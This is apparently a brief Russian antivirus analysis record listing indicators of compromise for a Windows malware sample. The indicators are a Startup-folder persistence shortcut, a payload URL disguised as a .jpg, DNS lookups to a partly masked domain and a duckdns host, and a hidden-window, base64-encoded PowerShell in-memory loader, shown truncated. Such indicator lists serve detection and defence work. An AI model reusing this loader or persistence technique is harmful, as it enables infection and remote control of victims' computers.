Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\geeks hangout.url
- http://www.4u##.com/uploads/file_2020-04-09_213025.jpg
- http://www.4u##.com/uploads/file_2020-04-09_213025.jpg
- DNS ASK 4u##.com
- DNS ASK dd####.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBq...' (со скрытым окном)